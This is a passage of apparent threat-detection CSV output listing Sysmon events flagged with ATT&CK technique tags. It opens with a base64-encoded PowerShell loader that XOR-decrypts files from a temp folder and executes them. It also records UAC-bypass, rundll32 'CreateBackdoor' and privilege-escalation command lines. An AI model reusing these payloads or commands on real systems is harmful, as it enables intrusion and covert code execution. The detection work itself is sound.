JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1564834103.555174,2019-08-03T16:08:23.555174+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-08-03T12:08:23.554778Z"">
</TimeCreated>
<EventRecordID>5452</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2780"" ThreadID=""3676"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-08-03 12:08:23.391</Data>
<Data Name=""ProcessGuid"">747F3D96-7937-5D45-0000-00100D290801</Data>
<Data Name=""ProcessId"">4192</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot;</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
<Data Name=""LogonGuid"">747F3D96-D4E9-5D45-0000-0020E7030000</Data>
<Data Name=""LogonId"">0x3e7</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">System</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-7934-5D45-0000-0010CAB90701</Data>
<Data Name=""ParentProcessId"">7564</Data>
<Data Name=""ParentImage"">C:\Windows\System32\consent.exe</Data>
<Data Name=""ParentCommandLine"">consent.exe 896 272 00000280644BC500</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1589069378.023663,2020-05-10T04:09:38.023663+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( c:\Windows\System32\cmd.exe ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-05-10T00:09:36.709454Z"">
</TimeCreated>
<EventRecordID>112969</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2728"" ThreadID=""3432"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-05-10 00:09:36.703</Data>
<Data Name=""ProcessGuid"">747F3D96-4640-5EB7-0000-0010EF364B01</Data>
<Data Name=""ProcessId"">372</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.592 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">Cmd.Exe</Data>
<Data Name=""CommandLine"">c:\Windows\System32\cmd.exe</Data>
<Data Name=""CurrentDirectory"">c:\Users\IEUser\Tools\PrivEsc\</Data>
<Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
<Data Name=""LogonGuid"">747F3D96-3B92-5EB5-0000-0020E7030000</Data>
<Data Name=""LogonId"">0x3e7</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">System</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-4640-5EB7-0000-0010292D4B01</Data>
<Data Name=""ParentProcessId"">8028</Data>
<Data Name=""ParentImage"">C:\Users\IEUser\Tools\PrivEsc\NetworkServiceExploit.exe</Data>
<Data Name=""ParentCommandLine"">NetworkServiceExploit.exe -i -c &quot;c:\Windows\System32\cmd.exe&quot;</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1117] Bypassing Application Whitelisting,1584766817.998461,2020-03-21T09:00:17.998461+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor)",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-03-21T05:00:17.997235Z"">
</TimeCreated>
<EventRecordID>243516</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2860"" ThreadID=""3508"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-03-21 05:00:17.518</Data>
<Data Name=""ProcessGuid"">747F3D96-9F61-5E75-0000-00109B6C1E00</Data>
<Data Name=""ProcessId"">6620</Data>
<Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">RUNDLL32.EXE</Data>
<Data Name=""CommandLine"">rundll32 windowscoredeviceinfo.dll,CreateBackdoor</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
<Data Name=""LogonGuid"">747F3D96-9DBA-5E75-0000-0020E7030000</Data>
<Data Name=""LogonId"">0x3e7</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">System</Data>
<Data Name=""Hashes"">SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A</Data>
<Data Name=""ParentProcessGuid"">747F3D96-9DBC-5E75-0000-00102C390100</Data>
<Data Name=""ParentProcessId"">1652</Data>
<Data Name=""ParentImage"">C:\Windows\System32\svchost.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1584766817.998461,2020-03-21T09:00:17.998461+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-03-21T05:00:17.997235Z"">
</TimeCreated>
<EventRecordID>243516</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2860"" ThreadID=""3508"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-03-21 05:00:17.518</Data>
<Data Name=""ProcessGuid"">747F3D96-9F61-5E75-0000-00109B6C1E00</Data>
<Data Name=""ProcessId"">6620</Data>
<Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">RUNDLL32.EXE</Data>
<Data Name=""CommandLine"">rundll32 windowscoredeviceinfo.dll,CreateBackdoor</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
<Data Name=""LogonGuid"">747F3D96-9DBA-5E75-0000-0020E7030000</Data>
<Data Name=""LogonId"">0x3e7</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">System</Data>
<Data Name=""Hashes"">SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A</Data>
<Data Name=""ParentProcessGuid"">747F3D96-9DBC-5E75-0000-00102C390100</Data>
<Data Name=""ParentProcessId"">1652</Data>
<Data Name=""ParentImage"">C:\Windows\System32\svchost.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1117] Bypassing Application Whitelisting,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( &quot;C:\Windows\System32\rundll32.exe&quot; zipfldr.dll,RouteTheCall c:\Windows\System32\calc.exe)",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-12T13:58:54.897009Z"">
</TimeCreated>
<EventRecordID>16443</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2036"" ThreadID=""296"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-12 13:58:54.772</Data>
<Data Name=""ProcessGuid"">365ABB72-269E-5CD8-0000-001084F81A00</Data>
<Data Name=""ProcessId"">2728</Data>
<Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
<Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\System32\rundll32.exe&quot; zipfldr.dll,RouteTheCall c:\Windows\System32\calc.exe</Data>
<Data Name=""CurrentDirectory"">C:\Users\IEUser\Downloads\WinPwnage-master\WinPwnage-master\</Data>
<Data Name=""User"">IEWIN7\IEUser</Data>
<Data Name=""LogonGuid"">365ABB72-2523-5CD8-0000-00204C360100</Data>
<Data Name=""LogonId"">0x1364c</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">Medium</Data>
<Data Name=""Hashes"">SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238</Data>
<Data Name=""ParentProcessGuid"">365ABB72-268F-5CD8-0000-0010F4A51700</Data>
<Data Name=""ParentProcessId"">1256</Data>
<Data Name=""ParentImage"">C:\Python27\python.exe</Data>
<Data Name=""ParentCommandLine"">python winpwnage.py -u execute -i 14 -p c:\Windows\System32\calc.exe</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1085] Rundll32 Execution detected,1584766817.998461,2020-03-21T09:00:17.998461+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-03-21T05:00:17.997235Z"">
</TimeCreated>
<EventRecordID>243516</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2860"" ThreadID=""3508"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-03-21 05:00:17.518</Data>
<Data Name=""ProcessGuid"">747F3D96-9F61-5E75-0000-00109B6C1E00</Data>
<Data Name=""ProcessId"">6620</Data>
<Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">RUNDLL32.EXE</Data>
<Data Name=""CommandLine"">rundll32 windowscoredeviceinfo.dll,CreateBackdoor</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
<Data Name=""LogonGuid"">747F3D96-9DBA-5E75-0000-0020E7030000</Data>
<Data Name=""LogonId"">0x3e7</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">System</Data>
<Data Name=""Hashes"">SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A</Data>
<Data Name=""ParentProcessGuid"">747F3D96-9DBC-5E75-0000-00102C390100</Data>
<Data Name=""ParentProcessId"">1652</Data>
<Data Name=""ParentImage"">C:\Windows\System32\svchost.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,High,"Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( &quot;C:\Windows\System32\rundll32.exe&quot; zipfldr.dll,RouteTheCall c:\Windows\System32\calc.exe )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-12T13:58:54.897009Z"">
</TimeCreated>
<EventRecordID>16443</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2036"" ThreadID=""296"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-12 13:58:54.772</Data>
<Data Name=""ProcessGuid"">365ABB72-269E-5CD8-0000-001084F81A00</Data>
<Data Name=""ProcessId"">2728</Data>
<Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
<Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\System32\rundll32.exe&quot; zipfldr.dll,RouteTheCall c:\Windows\System32\calc.exe</Data>
<Data Name=""CurrentDirectory"">C:\Users\IEUser\Downloads\WinPwnage-master\WinPwnage-master\</Data>
<Data Name=""User"">IEWIN7\IEUser</Data>
<Data Name=""LogonGuid"">365ABB72-2523-5CD8-0000-00204C360100</Data>
<Data Name=""LogonId"">0x1364c</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">Medium</Data>
<Data Name=""Hashes"">SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238</Data>
<Data Name=""ParentProcessGuid"">365ABB72-268F-5CD8-0000-0010F4A51700</Data>
<Data Name=""ParentProcessId"">1256</Data>
<Data Name=""ParentImage"">C:\Python27\python.exe</Data>
<Data Name=""ParentCommandLine"">python winpwnage.py -u execute -i 14 -p c:\Windows\System32\calc.exe</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1085] Rundll32 Execution detected,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,High,"Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( &quot;C:\Windows\System32\rundll32.exe&quot; zipfldr.dll,RouteTheCall c:\Windows\System32\calc.exe )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-12T13:58:54.897009Z"">
</TimeCreated>
<EventRecordID>16443</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2036"" ThreadID=""296"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-12 13:58:54.772</Data>
<Data Name=""ProcessGuid"">365ABB72-269E-5CD8-0000-001084F81A00</Data>
<Data Name=""ProcessId"">2728</Data>
<Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
<Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\System32\rundll32.exe&quot; zipfldr.dll,RouteTheCall c:\Windows\System32\calc.exe</Data>
<Data Name=""CurrentDirectory"">C:\Users\IEUser\Downloads\WinPwnage-master\WinPwnage-master\</Data>
<Data Name=""User"">IEWIN7\IEUser</Data>
<Data Name=""LogonGuid"">365ABB72-2523-5CD8-0000-00204C360100</Data>
<Data Name=""LogonId"">0x1364c</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">Medium</Data>
<Data Name=""Hashes"">SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238</Data>
<Data Name=""ParentProcessGuid"">365ABB72-268F-5CD8-0000-0010F4A51700</Data>
<Data Name=""ParentProcessId"">1256</Data>
<Data Name=""ParentImage"">C:\Python27\python.exe</Data>
<Data Name=""ParentCommandLine"">python winpwnage.py -u execute -i 14 -p c:\Windows\System32\calc.exe</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,Low,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( c:\windows\System32\cmd.exe ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-11T17:28:22.598305Z"">
</TimeCreated>
<EventRecordID>16040</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2008"" ThreadID=""1992"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-11 17:28:22.488</Data>
<Data Name=""ProcessGuid"">365ABB72-0636-5CD7-0000-0010A6C72100</Data>
<Data Name=""ProcessId"">544</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">6.1.7601.17514 (win7sp1_rtm.101119-1850)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">c:\windows\System32\cmd.exe</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">IEWIN7\IEUser</Data>
<Data Name=""LogonGuid"">365ABB72-F9CD-5CD6-0000-00201B370100</Data>
<Data Name=""LogonId"">0x1371b</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163</Data>
<Data Name=""ParentProcessGuid"">365ABB72-0545-5CD7-0000-001078371F00</Data>
<Data Name=""ParentProcessId"">3044</Data>
